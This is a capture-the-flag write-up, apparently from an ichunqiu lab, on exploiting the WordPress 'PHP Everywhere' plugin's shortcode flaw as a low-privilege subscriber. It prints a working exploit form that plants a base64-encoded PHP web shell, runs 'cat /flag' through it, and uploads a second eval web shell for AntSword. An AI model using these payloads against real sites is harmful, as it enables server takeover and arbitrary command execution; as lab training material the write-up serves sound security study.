Table of contents
2. Construct exp to execute php
1. Topic
introduce:
A remote code execution vulnerability that could allow any subscriber to send a request with the "shortcode" parameter set to PHP Everywhere and execute arbitrary PHP code on the site. PS There are common usernames, low-privileged users, and weak passwords
Enter the topic:
Discovery is a WordPress blog page
The background link of wp is spliced on wp-admin to enter the background
The account password is test: test
Successfully entered:
2. Construct exp to execute php
After entering, it is now a subscriber authority, which is low authority. We choose to modify the code and insert the following code on any page:
Construct exp:
<form action="http://xxx.ichunqiu.com/wp-admin/admin-ajax.php" method="post">
<input name="action" value="parse-media-shortcode" />
<textarea name="shortcode">[php_everywhere] <?php file_put_contents("/var/www/html/system.php",base64_decode("PD9waHAgc3lzdGVtKCRfR0VUWzFdKTsgPz4=")); ?>[/php_everywhere]</textarea>
<input type="submit" value="Execute" />
</form>
Note:
The URL is the domain name of the shooting range at that time http://xxx.qchunqiu.com
The core Trojan here xxx.php can be named arbitrarily
"/var/www/html/xxx.php",base64_decode("PD9waHAgc3lzdGVtKCRfR0VUWzFdKTsgPz4=")
<?php system($_GET[1]); ?> after base64 PD9waHAgc3lzdGVtKCRfR0VUWzFdKTsgPz4=
f12 toolbar
Click the small mouse in the upper left corner to enable sequential search:
Place the mouse cursor on the web page overview to view the source code location:
Right click to modify in HTML format:
ctrl + a select all
Copy and paste directly:
Then click on the blank page
The page will become as shown in the figure:
Click Execute to upload:
Seeing that our Trojan horse success uploaded successfully:
The URL now looks like this:
Directly add xxx.php?1=cat /flag after http://xxx.ichunqiu.com/ of the URL of the root directory
flag{0d0bd090-dee5-48ba-9f57-d8bed09876a9}
3. Ant sword connection
Construct and connect a one-sentence Trojan horse:
<?php @eval($_POST['pass']);?> base64后:
PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ10pOz8+
Upload in the same way:
successSuccessful:
Ant Sword:
View the flag in the root directory:
Get the flag:
flag{0d0bd090-dee5-48ba-9f57-d8bed09876a9}